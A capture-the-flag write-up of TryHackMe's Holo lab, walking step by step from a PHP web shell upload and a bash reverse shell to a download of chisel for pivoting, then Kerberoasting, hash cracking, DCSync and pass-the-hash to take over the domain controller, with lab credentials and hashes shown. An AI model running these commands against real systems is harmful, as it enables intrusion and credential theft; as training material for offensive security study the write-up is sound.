Overview
TryHackMe's Holo network is a full red team engagement spanning 4 machines with an Active Directory domain. This covers the complete chain from initial web shell upload to domain controller compromise.
Phase 1: External Recon
nmap -sV -sC -p- --min-rate 5000 10.200.95.33 -oN holo_external.txt
PORT STATE SERVICE
22/tcp open ssh OpenSSH 8.2p1
80/tcp open http Apache 2.4.41
443/tcp open https Apache 2.4.41
8080/tcp open http Node.js
Phase 2: Web Shell Upload
# Directory enumeration
gobuster dir -u http://10.200.95.33 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html
# Found: /upload.php [200]
# Bypass MIME-type filter with double extension
echo '<?php system($_GET["cmd"]); ?>' > shell.php.jpg
curl -X POST http://10.200.95.33/upload.php \
-F "file=@shell.php.jpg;type=image/jpeg" -v
# Execute RCE
curl "http://10.200.95.33/uploads/shell.php.jpg?cmd=id"
# uid=33(www-data) gid=33(www-data)
Reverse Shell
# Attacker: start listener
nc -lvnp 4444
# Trigger via web shell
curl "http://10.200.95.33/uploads/shell.php.jpg?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.50.95.1/4444+0>%261'"
Phase 3: Internal Pivoting
# Upload chisel for SOCKS tunnel
wget http://10.50.95.1/chisel -O /tmp/chisel && chmod +x /tmp/chisel
# Attacker: chisel server
./chisel server -p 8888 --reverse
# Target: connect back
/tmp/chisel client 10.50.95.1:8888 R:socks
# Scan internal range via proxychains
proxychains nmap -sT -p 445,88,389,3389 10.200.95.0/24 --open
# 10.200.95.101 — DC01.holo.live (AD Domain Controller)
Phase 4: Kerberoasting → Domain Admin
# Extract Kerberoastable SPNs
proxychains python3 GetUserSPNs.py holo.live/svc_web:Password123 \
-dc-ip 10.200.95.101 -request -outputfile hashes.txt
# Crack the hash
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
# svc_backup:Backup2026!
# DCSync with cracked credentials
proxychains python3 secretsdump.py holo.live/svc_backup:Backup2026!@10.200.95.101
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b
# Pass-the-hash → Domain Controller
proxychains python3 psexec.py -hashes :64f12cddaa88057e06a81b54e73b949b \
Administrator@10.200.95.101
C:\> whoami
holo\administrator
C:\> type C:\Users\Administrator\Desktop\root.txt
THM{4d_c0mpr0m1s3d_h0l0_n3tw0rk}
Conclusion
The Holo chain demonstrated a realistic enterprise attack path: web RCE → network pivot → Kerberoasting → DCSync → domain admin. Service account passwords remain consistently weak — an issue that mirrors real enterprise environments.